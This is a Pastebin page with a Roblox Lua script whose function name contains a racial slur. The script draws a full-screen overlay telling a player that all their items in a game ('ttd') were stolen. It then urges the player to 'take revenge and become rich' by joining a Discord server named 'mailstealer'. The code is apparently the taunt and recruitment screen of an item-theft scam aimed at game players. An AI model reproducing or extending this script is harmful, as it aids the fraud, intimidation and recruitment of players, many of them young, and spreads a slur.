Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local function GetScammedNigga()
- local instance = {instances = {}}
- function instance.new(class, properties)
- local inst = Instance.new(class)
- for property, value in next, properties do
- inst[property] = value
- end
- table.insert(instance.instances, inst)
- return inst
- end
- local ScreenGui =
- instance.new(
- "ScreenGui",
- {
- Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui"),
- ZIndexBehavior = Enum.ZIndexBehavior.Sibling,
- DisplayOrder = 60000000000001
- }
- )
- local scammedez =
- instance.new(
- "Frame",
- {
- Name = "scammed ez",
- Parent = ScreenGui,
- BackgroundColor3 = Color3.fromRGB(40, 40, 40),
- BorderColor3 = Color3.fromRGB(0, 0, 0),
- BorderSizePixel = 0,
- Position = UDim2.new(0, 0, 1.1365951e-07, 0),
- Size = UDim2.new(1, 0, 1, 5)
- }
- )
- local TextLabel =
- instance.new(
- "TextLabel",
- {
- Parent = scammedez,
- BackgroundColor3 = Color3.fromRGB(40, 40, 40),
- BorderColor3 = Color3.fromRGB(0, 0, 0),
- BorderSizePixel = 0,
- Position = UDim2.new(0.248348162, 0, 0.0528541245, 0),
- Size = UDim2.new(0.502200425, 0, 0.121825397, 0),
- Font = Enum.Font.FredokaOne,
- Text = "ALL YOUR STUFF HAS JUST BEEN STOLEN",
- TextColor3 = Color3.fromRGB(0, 255, 42),
- TextScaled = true,
- TextSize = 14.000,
- TextWrapped = true
- }
- )
- local TextLabel =
- instance.new(
- "TextLabel",
- {
- Parent = scammedez,
- BackgroundColor3 = Color3.fromRGB(40, 40, 40),
- BorderColor3 = Color3.fromRGB(0, 0, 0),
- BorderSizePixel = 0,
- Position = UDim2.new(0.123158529, 0, 0.209235922, 0),
- Size = UDim2.new(0.751820982, 0, 0.123234972, 0),
- Font = Enum.Font.FredokaOne,
- Text = "We stole everything u had in ttd",
- TextColor3 = Color3.fromRGB(255, 0, 4),
- TextScaled = true,
- TextSize = 14.000,
- TextWrapped = true
- }
- )
- local TextLabel =
- instance.new(
- "TextLabel",
- {
- Parent = scammedez,
- BackgroundColor3 = Color3.fromRGB(40, 40, 40),
- BorderColor3 = Color3.fromRGB(0, 0, 0),
- BorderSizePixel = 0,
- Position = UDim2.new(0.101914264, 0, 0.349384248, 0),
- Size = UDim2.new(0.795068204, 0, 0.0726670548, 0),
- Font = Enum.Font.FredokaOne,
- Text = "U probably want to get ur stuff back",
- TextColor3 = Color3.fromRGB(255, 142, 49),
- TextScaled = true,
- TextSize = 14.000,
- TextWrapped = true
- }
- )
- local TextLabel =
- instance.new(
- "TextLabel",
- {
- Parent = scammedez,
- BackgroundColor3 = Color3.fromRGB(40, 40, 40),
- BorderColor3 = Color3.fromRGB(0, 0, 0),
- BorderSizePixel = 0,
- Position = UDim2.new(0.197513744, 0, 0.733943939, 0),
- Size = UDim2.new(0.654704094, 0, 0.168317646, 0),
- Font = Enum.Font.FredokaOne,
- Text = "If u want to take revenge and become rich join our discord .gg/mailstealer",
- TextColor3 = Color3.fromRGB(182, 123, 255),
- TextScaled = true,
- TextSize = 14.000,
- TextWrapped = true
- }
- )
- end
- GetScammedNigga()
Advertisement
Add Comment
Please, Sign In to add comment